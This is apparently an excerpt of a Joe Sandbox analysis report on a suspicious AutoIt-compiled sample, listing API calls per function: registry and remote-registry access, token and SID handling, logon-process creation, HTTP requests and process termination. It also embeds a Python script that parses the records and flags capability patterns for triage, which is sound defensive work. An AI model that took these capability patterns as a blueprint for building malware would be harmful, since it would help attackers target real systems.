                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4137160315-0
                                                                                                                            • Opcode ID: 864bd62b2b18ad66cdc264b57925bbf3966b854b9bfb3039c26c6a97ba7e6d62
                                                                                                                            • Instruction ID: ddca870a545732ff809b188edbc9ab471eb2007f088194b2f07956f872ce68d9
                                                                                                                            • Opcode Fuzzy Hash: 864bd62b2b18ad66cdc264b57925bbf3966b854b9bfb3039c26c6a97ba7e6d62
                                                                                                                            • Instruction Fuzzy Hash: 4A31F472508309ABC720EF14DC49B5BBBA9FF88314F000519F99597191C774EE08DB92
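The function records above (an "APIs" list of call sites, followed by the dump source and the Similarity fields) are easier to triage in bulk than by reading them one at a time. The following Python is an added example, not Joe Sandbox tooling: it parses records in exactly that layout into structured objects, keeps direct calls apart from those reported as "Part of subcall function", and flags functions whose API mix matches a few capability rules. The rule sets (registry enumeration, remote registry, token/SID handling, input simulation) are this example's own choices, and the embedded text is a constructed excerpt of two records from this page. One caveat: when the analysed binary is a script interpreter with an embedded script, its runtime contains routines like these whether or not the script ever invokes them, so a hit shows available capability, not observed behaviour.

```python
"""Parse Joe Sandbox-style per-function "APIs" records and flag capability patterns.

Added example, not Joe Sandbox code. The rule sets below are this example's own
choices; SAMPLE is a constructed excerpt of two records in the report's layout.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Matches one call-site bullet, with or without an argument list, with or without
# the "Part of subcall function XXXX:" prefix the report uses for nested calls.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Matches the "Key: value" bullets (Source File, API ID, API String ID, hashes ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Constructed excerpt: two records copied in the report's layout (not fetched).
SAMPLE = """APIs
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F602BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F602FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F60349
• RegCloseKey.ADVAPI32(00000000), ref: 00F60399
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Instruction Fuzzy Hash: BB515871608244AFC700EF64D886E6FBBE8FF84314F14492DF5959B2A2DB31E904EB52
APIs
• GetMenu.USER32(?), ref: 00F657FB
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00F65928
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Instruction Fuzzy Hash: 80514C35E00619EFCF15EF64C845AAEBBB4EF48720F144069E852BB351CB74AE41EB94
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                      # call-site address as printed in the report
    parent: Optional[str] = None  # address of the subcall function, if nested


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def api_names(self, include_subcalls: bool = True) -> Set[str]:
        """Set of API names, optionally restricted to the function's own call sites."""
        return {c.api for c in self.calls if include_subcalls or c.parent is None}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the text at each 'APIs' header and collect calls and key/value fields."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            current.calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["parent"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"]
    return records


# A function is flagged when it calls every API in a rule's set (subcalls included).
# These sets are illustrative choices for this example, not a vendor signature.
CAPABILITY_RULES: Dict[str, Set[str]] = {
    "registry-enumeration": {"RegOpenKeyExW", "RegEnumValueW"},
    "remote-registry": {"RegConnectRegistryW"},
    "token-sid-handling": {"GetTokenInformation", "CopySid"},
    "input-simulation": {"mouse_event"},
}


def triage(records: List[FunctionRecord]) -> List[Tuple[int, str, str]]:
    """Return (record index, rule label, API String ID) for every rule a record satisfies."""
    hits = []
    for idx, rec in enumerate(records):
        names = rec.api_names()
        for label, required in CAPABILITY_RULES.items():
            if required <= names:
                hits.append((idx, label, rec.fields.get("API String ID", "?")))
    return hits


if __name__ == "__main__":
    for idx, label, api_string_id in triage(parse_records(SAMPLE)):
        print(f"record {idx}: {label} (API String ID {api_string_id})")
```

Feed it a saved copy of the report's function section instead of SAMPLE to get a per-function capability list; the "API String ID" carried in each hit lets you cross-reference the same function across reports of related samples.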
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F380C0
                                                                                                                              • Part of subcall function 00F380A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F380CA
                                                                                                                              • Part of subcall function 00F380A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F380D9
                                                                                                                              • Part of subcall function 00F380A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F380E0
                                                                                                                              • Part of subcall function 00F380A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F380F6
                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00F3842F), ref: 00F388CA
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F388D6
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00F388DD
                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F388F6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00F3842F), ref: 00F3890A
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00F38911
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3008561057-0
                                                                                                                            • Opcode ID: 6794622bbf95db263d1c248f5b85ff66e69120ecd6315ebb63b527b30979f4ab
                                                                                                                            • Instruction ID: 6faae9905540d407eb2f300d4ed642b9ec4bd7f3e71d59a99fcd21b18a1aa710
                                                                                                                            • Opcode Fuzzy Hash: 6794622bbf95db263d1c248f5b85ff66e69120ecd6315ebb63b527b30979f4ab
                                                                                                                            • Instruction Fuzzy Hash: 4E11AF72902209FFDB109FA4DC09BBE7B68FB453A5F104028F89597111CB7A9906EB60
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F385E2
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00F385E9
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F385F8
                                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00F38603
                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F38632
                                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F38646
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1413079979-0
                                                                                                                            • Opcode ID: f0306dbe4ad176a3e26df8ddf8bea7ff39729974ed032f70c69a350cfb9b331e
                                                                                                                            • Instruction ID: fc62717b2a12a851ee215e4b54cf19554dba927e2bff4da3b3af6e1bccfabf47
                                                                                                                            • Opcode Fuzzy Hash: f0306dbe4ad176a3e26df8ddf8bea7ff39729974ed032f70c69a350cfb9b331e
                                                                                                                            • Instruction Fuzzy Hash: 1A116A7250020DABDF018FA4ED49FDE7BA9EF08364F044064FE05A2160C7B68D65EB60
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00F3B7B5
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F3B7C6
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F3B7CD
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F3B7D5
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F3B7EC
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 00F3B7FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1035833867-0
                                                                                                                            • Opcode ID: a59d9a01f9fe5b2b9fb19885baefa45f8c5396b62a7891a748e7bcb69c51c538
                                                                                                                            • Instruction ID: eedc1a029df1fbd508a1548887dc424e3602c26a62e0572f5aed8de311bbae4b
                                                                                                                            • Opcode Fuzzy Hash: a59d9a01f9fe5b2b9fb19885baefa45f8c5396b62a7891a748e7bcb69c51c538
                                                                                                                            • Instruction Fuzzy Hash: A90184B5E00309BBEB109BA6DD45A5EBFB8EB48361F004075FA04E7391D6719C10DF90
                                                                                                                            APIs
                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F00193
                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F0019B
                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F001A6
                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F001B1
                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F001B9
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F001C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4278518827-0
                                                                                                                            • Opcode ID: 9a1cd249ea6b78497dbe4fd0efa69144246ed6945068ccd3abac48d35b843542
                                                                                                                            • Instruction ID: ad7bce91a1c3dfed5a9f837cc8bf6ce390385f7673230e0b1792d4b06deb739e
                                                                                                                            • Opcode Fuzzy Hash: 9a1cd249ea6b78497dbe4fd0efa69144246ed6945068ccd3abac48d35b843542
                                                                                                                            • Instruction Fuzzy Hash: F3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A868CBE5
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F453F9
                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F4540F
                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00F4541E
                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F4542D
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F45437
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F4543E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 839392675-0
                                                                                                                            • Opcode ID: ba6802b3620d15c30e85554ff6b3faef275de388f855d68905258d978e30b267
                                                                                                                            • Instruction ID: 6963ed20177429896414d59e217fdef1946e82ba1ee7016029ec557b6f05ed6e
                                                                                                                            • Opcode Fuzzy Hash: ba6802b3620d15c30e85554ff6b3faef275de388f855d68905258d978e30b267
                                                                                                                            • Instruction Fuzzy Hash: 45F06D3224015CBBE3205BA2EC0EEAB7E7CEBC7B11F000169FA14D106196E11A05A6B5
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00F47243
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00EF0EE4,?,?), ref: 00F47254
                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00EF0EE4,?,?), ref: 00F47261
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EF0EE4,?,?), ref: 00F4726E
                                                                                                                              • Part of subcall function 00F46C35: CloseHandle.KERNEL32(00000000,?,00F4727B,?,00EF0EE4,?,?), ref: 00F46C3F
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F47281
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00EF0EE4,?,?), ref: 00F47288
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3495660284-0
                                                                                                                            • Opcode ID: e7e56854c7707a9dc4fc7da3a90d1dda96b94c417c5799776055443a2d2a52e7
                                                                                                                            • Instruction ID: 5836106a8788e392e896cff4f479dbbadef55abb49f4d563b4c04b1be9023f4f
                                                                                                                            • Opcode Fuzzy Hash: e7e56854c7707a9dc4fc7da3a90d1dda96b94c417c5799776055443a2d2a52e7
                                                                                                                            • Instruction Fuzzy Hash: A9F0BE36444206EBD7112B24FC8C9DA7B29FF06312B000231F603900A0CBF61804EF50
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F3899D
                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00F389A9
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F389B2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F389BA
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F389C3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00F389CA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• VariantInit.OLEAUT32(?), ref: 00F58613
• CharUpperBuffW.USER32(?,?), ref: 00F58722
• VariantClear.OLEAUT32(?), ref: 00F5889A
  • Part of subcall function 00F47562: VariantInit.OLEAUT32(00000000), ref: 00F475A2
  • Part of subcall function 00F47562: VariantCopy.OLEAUT32(00000000,?), ref: 00F475AB
  • Part of subcall function 00F47562: VariantClear.OLEAUT32(00000000), ref: 00F475B7
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
• _memset.LIBCMT ref: 00F42B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F42BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F42C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F42C97
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
APIs
Similarity
• API ID: _memmove$_free
• String ID: 3c$_
• API String ID: 2620147621-4099079164
APIs
Similarity
• API ID: _memset$_memmove
• String ID: 3c$ERCP
• API String ID: 2532777613-1756721700
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F3D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F3D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F3D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F3D69D
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
APIs
• _memset.LIBCMT ref: 00F427C0
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F427DC
• DeleteMenu.USER32(?,00000007,00000000), ref: 00F42822
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FA5890,00000000), ref: 00F4286B
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F5D7C5
  • Part of subcall function 00EE784B: _memmove.LIBCMT ref: 00EE7899
Similarity
• API ID: BuffCharLower_memmove
• String ID: cdecl$none$stdcall$winapi
• API String ID: 3425801089-567219261
APIs
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
  • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F38F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F38F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00F38F57
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 365058703-1403004172
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F5184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F51872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F518A2
• InternetCloseHandle.WININET(00000000), ref: 00F518E9
  • Part of subcall function 00F52483: GetLastError.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F52498
  • Part of subcall function 00F52483: SetEvent.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F524AD
Strings
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
APIs
  • Part of subcall function 00EE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EE1D73
  • Part of subcall function 00EE1D35: GetStockObject.GDI32(00000011), ref: 00EE1D87
  • Part of subcall function 00EE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE1D91
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F66461
• LoadLibraryW.KERNEL32(?), ref: 00F66468
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F6647D
• DestroyWindow.USER32(?), ref: 00F66485
Strings
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00F46DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F46DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00F46E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F46E3B
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00F46E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F46EBB
• GetStdHandle.KERNEL32(000000F6), ref: 00F46ECC
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F46F06
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F4AC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F4ACA8
• __swprintf.LIBCMT ref: 00F4ACC1
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00F6F910), ref: 00F4ACFF
Strings
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
APIs
• CharUpperBuffW.USER32(?,?), ref: 00F41B19
Strings
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F5EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F5EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F5ED6A
• CloseHandle.KERNEL32(?), ref: 00F5EDEB
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2364364464-0
                                                                                                                            • Opcode ID: 78dcd0cb06f3839619c3b359fd531343ebb9da1fae97a17035c314c27f1957ac
                                                                                                                            • Instruction ID: 2ea61e42f530ed6fda0c53de252c09a1d896e9f7acc9f802ff4dffe489fb35a6
                                                                                                                            • Opcode Fuzzy Hash: 78dcd0cb06f3839619c3b359fd531343ebb9da1fae97a17035c314c27f1957ac
                                                                                                                            • Instruction Fuzzy Hash: B5817371600304AFD764EF29CC46F6AB7E5AF44720F04881DF999EB292D7B0AD44CB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F600FD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F6013C
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F60183
                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00F601AF
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F601BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
